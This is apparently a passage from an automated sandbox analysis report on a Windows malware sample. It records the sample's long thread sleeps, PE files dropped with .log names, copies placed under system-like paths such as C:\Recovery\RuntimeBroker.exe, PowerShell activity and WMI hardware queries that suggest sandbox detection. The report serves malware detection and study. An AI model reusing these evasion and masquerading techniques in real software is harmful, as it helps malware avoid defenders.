                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 580765
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 580562
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 580362
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 580109
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 579684
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 579469
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 579265
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 579078
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 578958
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 578784
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 578640
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 578424
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 578250
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 578031
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 577850
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 577547
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 576906
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 576625
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 576312
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 576089
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 575859
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 575664
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 575453
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 575261
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 575109
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 574944
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 574609
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 574241
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 574118
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 573984
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 573845
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 573734
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 573624
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 573515
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 573403
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 573297
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 573155
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 573043
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 572920
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 572798
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 572687
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 572552
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 572359
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 572217
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 572047
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 571781
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 571572
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 571449
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 571311
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 571156
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 571045
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 300000
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 570935
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 570827
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 570717
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 570609
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 570499
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 570390
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 570264
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 570156
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 570044
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 569937
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 569828
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 569719
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 569603
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 569333
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 569015
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 568902
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 568797
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 568687
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 568578
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 568459
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 568344
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 568234
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 922337203685477
                      Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 922337203685477
                      Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 922337203685477
                      Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 922337203685477
                      Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4549
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4333
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3358
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3414
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3425
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWindow / User API: threadDelayed 6073
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWindow / User API: threadDelayed 3133
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\DNOFZBcI.log
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\xlsyLrRW.log
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\qJFYyXNw.log
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\jdYrkeMJ.log
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\YKVbAlIQ.log
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\BxjPijIe.log
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\XACLJBdm.log
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\GbeNbtEV.log
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\fmuTYeTZ.log
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\FGdoLyOG.log
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\iyARkwDy.log
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\wtLyrQzn.log
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\FPAovlhD.log
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\RjzUmbxe.log
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\LyGNneTv.log
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\BgcwUNOc.log
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\lWnZWaxI.log
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\rcIHUqTf.log
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\yZwGwFNU.log
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\IIQWghSC.log
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\kvbZFwSt.log
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\LqWvJvsp.log
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\XbctOGCS.log
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\ordqNcIm.log
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\eqGsIhxV.log
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\MUHnEZJK.log
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\zmagdNkm.log
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\FoaFqfIX.log
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\SWHMRrhv.log
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\pMdQdXyB.log
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\hKwJyjHA.log
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\WDaDoBOr.log
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\kZMRAajN.log
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\LgDeSLNM.log
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\crpSXvpM.log
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\zXYOSFcP.log
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\VZqLtXxX.log
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\BKcXESYN.log
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\yMEybVxl.log
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\tevppZXa.log
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\UPWuCoSt.log
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\aVrcADnQ.log
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\bAMSHhIJ.log
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\IeQwxcIQ.log
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\PTVdvIcA.log
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\QKxdLVJD.log
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\dLiSHAoK.log
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\RHZlgVYy.log
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\cvDcQhTg.log
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\VMyCYnho.log
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\DvHnLgjG.log
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\nuBirctr.log
                      Source: C:\Users\user\Desktop\84JufgBTrA.exe TID: 908Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 7736Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe TID: 7788Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Recovery\RuntimeBroker.exe TID: 8112Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7476Thread sleep count: 4549 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7616Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7484Thread sleep count: 4333 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7764Thread sleep time: -3689348814741908s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7640Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7456Thread sleep count: 3358 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7756Thread sleep time: -2767011611056431s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7648Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7460Thread sleep count: 3414 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7768Thread sleep time: -2767011611056431s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7608Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512Thread sleep count: 3425 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7772Thread sleep time: -3689348814741908s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7624Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Recovery\RuntimeBroker.exe TID: 7792Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 8040Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -32281802128991695s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -600000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -599856s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -599748s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -599640s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -599530s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -599417s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -599297s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -599178s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -599023s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 6020Thread sleep time: -54000000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -598719s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 3752Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -598312s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -597406s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -596969s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -596250s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -596015s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -595625s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -594812s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -594594s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -594250s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -593875s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -593734s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -593437s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -593140s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 6020 Thread sleep time: -300000s >= -30000s
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe TID: 4476 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 1068 Thread sleep time: -30000s >= -30000s
                      Source: C:\Recovery\RuntimeBroker.exe TID: 7668 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe TID: 7444 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Recovery\RuntimeBroker.exe TID: 5356 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe TID: 7452 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Recovery\RuntimeBroker.exe TID: 7672 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe TID: 2164 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Recovery\RuntimeBroker.exe TID: 2256 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
